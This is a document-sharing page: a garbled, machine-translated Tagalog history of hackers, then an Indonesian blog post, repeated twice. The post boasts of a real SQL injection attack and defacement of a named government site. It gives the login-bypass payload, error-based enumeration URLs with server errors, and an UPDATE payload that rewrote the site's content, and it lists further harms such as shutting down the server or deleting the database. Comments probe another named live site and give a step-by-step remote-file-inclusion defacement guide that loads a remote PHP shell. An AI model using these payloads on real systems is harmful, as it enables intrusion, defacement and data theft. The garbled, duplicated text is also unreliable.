Indonesia Kasaysayan Hacker An Hackers Dungisan Kompolnas
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Indonesia Kasaysayan Hacker An Hackers Dungisan Kompolnas as PDF for free.
More details
- Words: 1,508
- Pages: 7
Indonesia kasaysayan Hacker pamamaraan hackers dungisan kompolnas.go.id pamugaran pinanggalingan Indonesia Indonesia Threatens Pilipinas Kasaysayan ng Hacker Posted by fleahlit Abril 1, 2007 Hacker lilitaw sa unang bahagi ng 1960s sa pagitan ng mga kasapi ng mag-aaral organisasyon Tech Modelo riles ng tren Club sa artificial Intelligence Laboratory Massachusetts Institute of Technology (MIT). Ang mga grupo ng mag-aaral ay isa sa pangunguna pagpapaunlad ng teknolohiya ng computer at ang mga ito gumana sa isang bilang ng mga kompyuter ng karaniwang sukat computer. Ang unang salita Hacker ay lilitaw sa isang positibong kahulugan upang mailakip ang isang miyembro na may kadalubhasaan sa larangan ng computer at makalikha ng isang programa sa computer na ito ay mas mahusay kaysa sa na ay idinisenyo magkasama. Pagkatapos, sa 1983, lumalagong Hacker pagkakatulad upang mailakip ang isang taong may kinahuhumalingan na maunawaan at kontrolin ang computer system. Seksyon, sa taon para sa unang panahon ang FBI catch ang computer criminals 414s base sa Milwaukee USA. 414 ay ang code ng kanilang mga lokal na lugar. Grupo, na kung saan ay pagkatapos ay tinatawag Hacker ay ipinahayag na may kasalanan butas sa itaas na 60 computer, ang computer ng ari-arian Cancer Center Alaala Sloan-Kettering sa isang computer na pagmamay-ari ng Los Alamos National Laboratory. Ang isa sa mga perpetrators ay getting TESTIMONYAL kaligtasan dahil, habang ang iba pang mga 5 para makuha ang kaparusahan pagsubok. Pagkatapos ay sa susunod na ipakita sa iba pang mga grupo na ang kanilang mga sarili huminga hackers, ngunit ito ay hindi. Sila (lalo na mga adult na lalaki) na makakuha ng kasiyahan sa pamamagitan ng computer at break luminlang telepono (phreaking). Hacker sejati tumawag sa mga tao na ito 'galyetas' at hindi mo gusto na makipag-ugnayan sa kanila. Hacker kraker sejati tumingin bilang tamad ang mga tao, hindi responsable, at hindi masyadong smart. Hacker sejati hindi sang-ayon kung ito ay sinabi na ang isang tao na may seguridad na paglabag na ito ay isang Hacker. Ang Hacker etiap isang pulong minsan sa isang taon na ito ay gaganapin tuwing kalagitnaan ng Hulyo sa Las Vegas. Ajang pulong Hacker sa mundo ay tinatawag na def Con. Def Con kaganapan sa kaganapan ay mas pagpapalitan ng impormasyon at teknolohiya na may kaugnayan sa taga gawain.
Kompolnas.go.id Deface: SQL Injection Part-1 Deface membutuh seni. Seni Deface=sebuah identify of hacker dalam memperkenalkan eksistensi diri, bagaiman menemukan bug/kelemahan dan cara masuk ke system target. Pengertian sosial enginering merupakan hal utama dan dasar yg harus dipelajari bagi ‘new comer’ hacker. Deface ialah seni utama dimana setiap orang memiliki ciri tersendiri dalam melakukannya, kita dapat menilai tingkat ke ahlian sang hacker dalam deface. Hacker memiliki kunci spesial akses yang menunjukan kelebihan mereka dengan permahaman sbb: 1. Kenali target mu, tujuannya berbagi perasaan sayang. 2. Yakinkan hati kita, mampu kah mencuri “hati” target dengan saluran aliran data dengan kemampuan sosial enginering.
3. Ada pepatah “banyak jalan menuju China” Tidak bisa tembus web, coba aja loe beli hosting yg satu server dengan target, emang harus bermodal coz no education free now Sad 4. Rajin bertanya sama mbah google “alkitab hacker’ www.google.com 5. Di atas gunung masih ada gunung, maka belajarlah banyak dari hal yang tak terhingga, semampu kita Kalo sudah siap, saatnya dicoba, berikut ini hanya sebatas TRY alias latihan (memang sih cara kuno tapi cukup ampuh buah belajar). Latihan ini di ambil dari VIROLOG.info , silahkan dicoba, Maaf jika sudah kadaluarso. Hacking/Cracking : Beli Buku Gratis Apa Diface Yach????(SQL-Injection bug in gramedia) By. 4L13N Posted by admin on 2007/6/6 23:17:31 (1958 reads) Sebelumnya Gw minta maaf Ama www.kompolnas.go.id NB: Gw Cuma Anak Ingusan Yang slalu ingin tau jadi buat yang udeh master lewatin aja oke!!!!Sabtu 2-juni-2007 jam 10 malem Iseng-iseng gw surfing ke situs www.kompolnas.go.id niatnya sey liat-liat buku tiba-tiba ada setan yang bisikin “woi coba dong neh situs” iya coba-coba ga bayar kan???? ya udeh gw klik halaman member truz gw coba pake SQL_Injection dengan username: admin Password: ‘or ”=’ wah gileee bisa masuk, gak nyangka situs sekelas gramedia masih kena ama bug’s kaya gini, dalem hati gw ngomong “woii admin Why???hehe33x bisa beli buku gratis neyyy” kaga’ ah, gw ga’ mw jadi kriminal, logout aja ah!!! lagi-lagi, setan keparat bisikin “Udeh deface tuh situs!!!!” ehmm gimana ya?? udeh kepalang tanggung!! pake cara apa ya, yang enak???Oiya, Update database server aja ahh!!! saatnya mencari informasi, gw buka: http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137 buat nyari error gw tambahin tanda kutip satu dielakang jadinya kaya gini: http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137‘ wahhh ada, errornya!!! inject ahh buat nyari nama tabel n colomnya pake perintah ‘Having 1=1– http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137‘Having 1=1– kluar error deh : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.NEWSEVENT_ID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. wahh udaeh dapet nama tabel n kolum pertamanya “td_newsevent nama tabel n NEWSEVENT_ID nama kolum” terusin ahh!!! untuk tau kolum berikutnya gw pake perintah ‘Group+by+kolum_name(NEWSEVENT_ID)
http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137%20‘group%20by% 20td_newsevent.NEWSEVENT_ID– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.JUDUL’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Udeh dapet ney kolum JUDUL looping lagi ahh!!! http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137%20‘group%20by% 20td_newsevent.NEWSEVENT_ID,JUDUL– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.PENULIS’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Wahh kali ini kolum PENULIS gw looping lagihttp://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137%20‘group%20b y%20td_newsevent.NEWSEVENT_ID,JUDUL,PENULIS– truz errornya: (udeh ya gw cape ngetiknya pokoknya nama kolum-kolumnya iniJ ) NEWSEVENT_ID JUDUL PENULIS SUMMARY DESCRIPTION STATUSWawwww Informasinya udeh cukup neyyy…. deface-deface, tiba saatnya untuk menginjeksi database_nya disini gw pake perintah ‘Update+nama_tabel+set+nama_kolum=’pesan’;– jadinya kaya gini: http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137%20‘update+td_new sevent+set+DESCRIPTION=” <”font%20color=red><”marquee>4L13N%20FOUND%20BUG%20PLEASE%20PATC H%20YOUR%20SYSTEM ‘;– Kok lw gak pake perintah where sich??? Wah Gw terlalu malas untuk itu, lagian biar semua colum DESCRIPTION yang ada di tabel td_newsevent ikut ter_Update semuanya Hehe33x!! Nah ini dia hasilnye….:Gramedia toko buku paling populer se-Indonesia ternyata mempunyai situs yang bisa dibilang amat sangat rentan dari serangan hacker bahkan bocah ingusan yang ga’ tau apa-apa kaya gw juga bisa!!!!>>-A Apa cuma itu yang bisa kita laku’in tentu TIDAAAAKKK!!!! kalo ditelusuri lagi kita bisa : - Menambahkan isi database_Nya….pake perintah ‘Insert - mematikan Sql server….pake perintah ;shutdown - mencari username admin n passwordnya… pake perintah union+select ato convert
- mencari username member n passwordnya - deface satu halaman ato mungkin Nge_Remote - mendelete database - masih banyak lagi dahhhh cape neyy dah malem Kritik,Saran,Cacian n Makian mail To [email protected] kalo pujian kirim ke_ ALLAH SWT N Rosul2xnya Salam Hangat By. 4L13N Explore posts in the same categories: Hacking-Cracking-Carding dan Sejenisnya This entry was posted on Nopember 1, 2007 at 8:08 am and is filed under HackingCracking-Carding dan Sejenisnya. You can subscribe via RSS 2.0 feed to this post's comments. You can comment below, or link to this permanent URL from your own site. 5 Comments on “Deface: SQL Injection Part-1” 1. joe Says: Maret 4, 2008 at 8:56 am mas.. ini bisa buat testing gak? http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N77668670 MrSinggih : Coba ya mas … http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘ Microsoft JET Database Engine error ‘80040e14′ Syntax error in string in query expression ‘id_keg=’A98435693”’. /id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Having1 =1Microsoft JET Database Engine error ‘80040e14′ Syntax error (missing operator) in query expression ‘id_keg=’A98435693′Having1=1-”. /id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Group% 20by%20id_keg.’A98435693′Microsoft JET Database Engine error ‘80040e14′ Syntax error in string in query expression ‘id_keg.’A98435693′-”.
/id.agenda.asp, line 51 Dst…. :-) :-) Nanti saya ndak keterusan mas. Di coba sendiri saja. Monggo Balas 2. Singgih Kumoro Says: Maret 27, 2008 at 12:48 am Tutorial Cara deface yang Nyaman dan Enak Tenan … 1. Buka http://www.milw0rm. com 2. klik Search 3. ketik RFI (Remote File Inclusion) 4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal 5. Buka Google, dan liat Advisor yang kita pilih tersebut 6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut 7. Setelah dapat hasil dari Google, klik kanan Open NewTab [Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB] 8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya 9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor 10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found. 11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain. 12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error, 13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif] 14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilkan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion 15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memiliki full akses atau -rwxrwxrwx / -rw-rw-rw <– untuk file | drwxrwxrwx / drw-rw-rw <– untuk direktory 16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama decoding dikibarkan disana… 17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi (Original post by ping_win) Balas
Kompolnas.go.id Deface: SQL Injection Part-1 Deface membutuh seni. Seni Deface=sebuah identify of hacker dalam memperkenalkan eksistensi diri, bagaiman menemukan bug/kelemahan dan cara masuk ke system target. Pengertian sosial enginering merupakan hal utama dan dasar yg harus dipelajari bagi ‘new comer’ hacker. Deface ialah seni utama dimana setiap orang memiliki ciri tersendiri dalam melakukannya, kita dapat menilai tingkat ke ahlian sang hacker dalam deface. Hacker memiliki kunci spesial akses yang menunjukan kelebihan mereka dengan permahaman sbb: 1. Kenali target mu, tujuannya berbagi perasaan sayang. 2. Yakinkan hati kita, mampu kah mencuri “hati” target dengan saluran aliran data dengan kemampuan sosial enginering.
3. Ada pepatah “banyak jalan menuju China” Tidak bisa tembus web, coba aja loe beli hosting yg satu server dengan target, emang harus bermodal coz no education free now Sad 4. Rajin bertanya sama mbah google “alkitab hacker’ www.google.com 5. Di atas gunung masih ada gunung, maka belajarlah banyak dari hal yang tak terhingga, semampu kita Kalo sudah siap, saatnya dicoba, berikut ini hanya sebatas TRY alias latihan (memang sih cara kuno tapi cukup ampuh buah belajar). Latihan ini di ambil dari VIROLOG.info , silahkan dicoba, Maaf jika sudah kadaluarso. Hacking/Cracking : Beli Buku Gratis Apa Diface Yach????(SQL-Injection bug in gramedia) By. 4L13N Posted by admin on 2007/6/6 23:17:31 (1958 reads) Sebelumnya Gw minta maaf Ama www.kompolnas.go.id NB: Gw Cuma Anak Ingusan Yang slalu ingin tau jadi buat yang udeh master lewatin aja oke!!!!Sabtu 2-juni-2007 jam 10 malem Iseng-iseng gw surfing ke situs www.kompolnas.go.id niatnya sey liat-liat buku tiba-tiba ada setan yang bisikin “woi coba dong neh situs” iya coba-coba ga bayar kan???? ya udeh gw klik halaman member truz gw coba pake SQL_Injection dengan username: admin Password: ‘or ”=’ wah gileee bisa masuk, gak nyangka situs sekelas gramedia masih kena ama bug’s kaya gini, dalem hati gw ngomong “woii admin Why???hehe33x bisa beli buku gratis neyyy” kaga’ ah, gw ga’ mw jadi kriminal, logout aja ah!!! lagi-lagi, setan keparat bisikin “Udeh deface tuh situs!!!!” ehmm gimana ya?? udeh kepalang tanggung!! pake cara apa ya, yang enak???Oiya, Update database server aja ahh!!! saatnya mencari informasi, gw buka: http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137 buat nyari error gw tambahin tanda kutip satu dielakang jadinya kaya gini: http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137‘ wahhh ada, errornya!!! inject ahh buat nyari nama tabel n colomnya pake perintah ‘Having 1=1– http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137‘Having 1=1– kluar error deh : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.NEWSEVENT_ID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. wahh udaeh dapet nama tabel n kolum pertamanya “td_newsevent nama tabel n NEWSEVENT_ID nama kolum” terusin ahh!!! untuk tau kolum berikutnya gw pake perintah ‘Group+by+kolum_name(NEWSEVENT_ID)
http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137%20‘group%20by% 20td_newsevent.NEWSEVENT_ID– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.JUDUL’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Udeh dapet ney kolum JUDUL looping lagi ahh!!! http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137%20‘group%20by% 20td_newsevent.NEWSEVENT_ID,JUDUL– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.PENULIS’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Wahh kali ini kolum PENULIS gw looping lagihttp://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137%20‘group%20b y%20td_newsevent.NEWSEVENT_ID,JUDUL,PENULIS– truz errornya: (udeh ya gw cape ngetiknya pokoknya nama kolum-kolumnya iniJ ) NEWSEVENT_ID JUDUL PENULIS SUMMARY DESCRIPTION STATUSWawwww Informasinya udeh cukup neyyy…. deface-deface, tiba saatnya untuk menginjeksi database_nya disini gw pake perintah ‘Update+nama_tabel+set+nama_kolum=’pesan’;– jadinya kaya gini: http://www.kompolnas.go.id/detil_newsevent.asp?id=061110102137%20‘update+td_new sevent+set+DESCRIPTION=” <”font%20color=red><”marquee>4L13N%20FOUND%20BUG%20PLEASE%20PATC H%20YOUR%20SYSTEM ‘;– Kok lw gak pake perintah where sich??? Wah Gw terlalu malas untuk itu, lagian biar semua colum DESCRIPTION yang ada di tabel td_newsevent ikut ter_Update semuanya Hehe33x!! Nah ini dia hasilnye….:Gramedia toko buku paling populer se-Indonesia ternyata mempunyai situs yang bisa dibilang amat sangat rentan dari serangan hacker bahkan bocah ingusan yang ga’ tau apa-apa kaya gw juga bisa!!!!>>-A Apa cuma itu yang bisa kita laku’in tentu TIDAAAAKKK!!!! kalo ditelusuri lagi kita bisa : - Menambahkan isi database_Nya….pake perintah ‘Insert - mematikan Sql server….pake perintah ;shutdown - mencari username admin n passwordnya… pake perintah union+select ato convert
- mencari username member n passwordnya - deface satu halaman ato mungkin Nge_Remote - mendelete database - masih banyak lagi dahhhh cape neyy dah malem Kritik,Saran,Cacian n Makian mail To [email protected] kalo pujian kirim ke_ ALLAH SWT N Rosul2xnya Salam Hangat By. 4L13N Explore posts in the same categories: Hacking-Cracking-Carding dan Sejenisnya This entry was posted on Nopember 1, 2007 at 8:08 am and is filed under HackingCracking-Carding dan Sejenisnya. You can subscribe via RSS 2.0 feed to this post's comments. You can comment below, or link to this permanent URL from your own site. 5 Comments on “Deface: SQL Injection Part-1” 1. joe Says: Maret 4, 2008 at 8:56 am mas.. ini bisa buat testing gak? http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N77668670 MrSinggih : Coba ya mas … http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘ Microsoft JET Database Engine error ‘80040e14′ Syntax error in string in query expression ‘id_keg=’A98435693”’. /id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Having1 =1Microsoft JET Database Engine error ‘80040e14′ Syntax error (missing operator) in query expression ‘id_keg=’A98435693′Having1=1-”. /id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Group% 20by%20id_keg.’A98435693′Microsoft JET Database Engine error ‘80040e14′ Syntax error in string in query expression ‘id_keg.’A98435693′-”.
/id.agenda.asp, line 51 Dst…. :-) :-) Nanti saya ndak keterusan mas. Di coba sendiri saja. Monggo Balas 2. Singgih Kumoro Says: Maret 27, 2008 at 12:48 am Tutorial Cara deface yang Nyaman dan Enak Tenan … 1. Buka http://www.milw0rm. com 2. klik Search 3. ketik RFI (Remote File Inclusion) 4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal 5. Buka Google, dan liat Advisor yang kita pilih tersebut 6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut 7. Setelah dapat hasil dari Google, klik kanan Open NewTab [Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB] 8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya 9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor 10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found. 11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain. 12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error, 13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif] 14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilkan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion 15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memiliki full akses atau -rwxrwxrwx / -rw-rw-rw <– untuk file | drwxrwxrwx / drw-rw-rw <– untuk direktory 16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama decoding dikibarkan disana… 17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi (Original post by ping_win) Balas
Related Documents
Kasaysayan At Hacker Kraker
May 2020 3
Aostila Hacker Para Iniciantes - Mundo Dos Hackers
April 2020 7
Hackers
June 2020 33
Hackers
June 2020 30
Hackers
April 2020 39More Documents from ""
Kasaysayan At Hacker Kraker
May 2020 3
Kako To Hack Web Stranice
May 2020 3
